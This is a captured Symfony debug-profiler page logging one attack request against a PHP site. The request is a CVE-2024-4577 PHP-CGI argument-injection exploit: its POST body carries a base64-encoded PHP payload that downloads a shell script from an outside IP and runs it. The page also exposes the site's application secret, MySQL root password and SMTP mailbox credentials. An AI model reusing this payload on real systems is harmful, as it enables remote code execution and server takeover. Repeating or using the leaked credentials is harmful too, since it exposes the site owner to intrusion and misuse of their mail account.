n/a
Request
GET Parameters
Key | Value |
---|---|
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_api_platform_links | Symfony\Component\WebLink\GenericLinkProvider {#1280 -links: [ 1278 => Symfony\Component\WebLink\Link {#1278 -href: "https://81.91.93.29/api/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => "http://www.w3.org/ns/hydra/core#apiDocumentation" ] -attributes: [] } ] } |
_remove_csp_headers | true |
_stopwatch_token | "8f4780" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
connection | "keep-alive" |
content-length | "225" |
content-type | "application/x-www-form-urlencoded" |
host | "81.91.93.29:443" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Sun, 22 Sep 2024 18:31:45 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F81.91.93.29%2Fhello.world%22" |
x-debug-exception-file | "%2Fvar%2Fwww%2Fwebexciter%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:128" |
x-debug-token | "aef1b9" |
x-debug-token-link | "https://81.91.93.29/_profiler/1fa1b5" |
x-previous-debug-token | "1fa1b5" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "6cd0c47bbe7a0feccacf6fed3a8f7ff3" |
CORS_ALLOW_ORIGIN | "^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$" |
DATABASE_URL | "mysql://root:pswdb33@127.0.0.1:3306/alliancemarkets2" |
DYNAMIC_DATABASE_URL | "mysql://root:pswdb33@127.0.0.1:3306/am_demo" |
ESHOP_DEMO_DATABASE_URL | "mysql://root:pswdb33@127.0.0.1:3306/am_demo" |
MAILER_DSN | "smtp://info@virtualrealitycommerce.cz:p3U1b4j1-j1!@smtp.web4u.cz:587" |
MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "225" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/var/www/webexciter/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/webexciter/public" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTPS | "on" |
HTTP_ACCEPT | "*/*" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "81.91.93.29:443" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_HTTPS | "on" |
REDIRECT_QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/hello.world" |
REMOTE_ADDR | "8.217.98.75" |
REMOTE_PORT | "39210" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "https" |
REQUEST_TIME | 1727029905 |
REQUEST_TIME_FLOAT | 1727029905.6699 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/var/www/webexciter/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "81.91.93.29" |
SERVER_ADMIN | "webexciter@yahoo.com" |
SERVER_NAME | "81.91.93.29" |
SERVER_PORT | "443" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.25 (Debian) Server at 81.91.93.29 Port 443</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.25 (Debian)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,DYNAMIC_DATABASE_URL,ESHOP_DEMO_DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,CORS_ALLOW_ORIGIN" |